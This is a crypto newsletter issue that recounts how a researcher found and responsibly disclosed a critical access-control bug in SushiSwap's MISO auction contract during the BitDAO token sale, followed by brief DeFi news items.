Another Day, Another Hack… Almost!
How a Paradigm researcher prevented another disastrous hack and why it’s kind of ironic
Hey DEFI TIMES community,
Last week, we talked about the Poly Network hack, where a hacker was able to remove over $600 million from the protocol’s token bridge. Luckily, the hacker gave back almost all of the funds!
This time, things could have gone wrong… almost!
Sam Sun explained how he examined the smart contract code for the BitDAO token sale. BitDAO has completed a token sale worth over $365 million - with over $230 million from Peter Thiel, Pantera Capital, Dragonfly Capital, and other partners. It was one of the largest token sales in the history of DAO’s.
Sam Sun pointed out that there was a critical bug that could have threatened the whole $365 million.
Sun didn’t expect to find any bugs at first:
“I didn’t really expect this to be a vulnerability though, since I didn’t expect the Sushi team to make such an obvious misstep.”
After looking closer, he found a bug in the Miso Dutch auction contract. In fact, some of the functions apparently lacked access controls.
He tested the bug with a successful exploit and immediately contacted his colleagues Georgios Konstantopoulos and Dan Robinson to double-check.
“Suddenly, my little vulnerability just got a lot bigger. I wasn’t dealing with a bug that would let you outbid other participants. I was looking at a 350 million dollar bug.”
After that, Sam Sun contacted SushiSwap CTO Joseph Delong to rescue the funds. The SushiSwap and BitDAO team acted quickly: BitDAO manually ended the auction by buying the remaining allocation. Funds were safe!
But things could have gone differently! Why?
There’s a conflict of interest between SushiSwap and Paradigm. It’s widely known that Paradigm has a significant stake in Uniswap. Since SushiSwap is the main competitor of Uniswap, Paradigm basically saved their biggest enemy.
samczsun @samczsunAuditor's logs, 16th of August. I found a critical vulnerability in SushiSwap's MISO platform https://t.co/untzdxay7q
I wonder what would have happened if Sam Sun just left the bug to be naturally discovered. I think this would have significantly damaged SushiSwap’s reputation. It probably wouldn’t have killed SushiSwap completely, but Uniswap would have profited in a big way.
Things like this only happen in crypto!
Subscribe to our newsletter to level up your crypto game!
Gelato $GEL Whitelist Opening
Gelato has announced their whitelist opening for the $GEL token sale.
Eindhoven Bitcoin payment
The popular European football club PSV Eindhoven announced they will accept bitcoin for a new sponsorship deal!
AAVE and Curve on Avalanche
The two large DeFi blue chips, Aave and Curve, will launch on Avalanche within a $180 million incentive program.
Rainbow Supports L2s
Rainbow, which is an Ethereum wallet, will now support Optimism, Arbitrum, and Polygon.
Tally Wallet has been announced - a Metamask competitor. It aims to bring a truly community-owned web3 wallet to the market.
1inch on Optimism
1inch has announced that they launched on Optimism.
SuperRare has introduced $RARE and aims to decentralize the platform with a DAO.
QuickSwap Limit Orders
QuickSwap has integrated limit orders - in partnership with Gelato.
Aave goes mobile
The Aave community made a proposal to build a mobile app. The app should grow the number of users and TVL.
Find us on:
DISCLAIMER: All information presented above is meant for informational purposes only and should not be treated as financial, legal, or tax advice. This article's content solely reflects the opinion of the writer, who is not a financial advisor.
Do your own research before you purchase cryptocurrencies. Any cryptocurrency can go down in value. Holding cryptocurrencies is risky.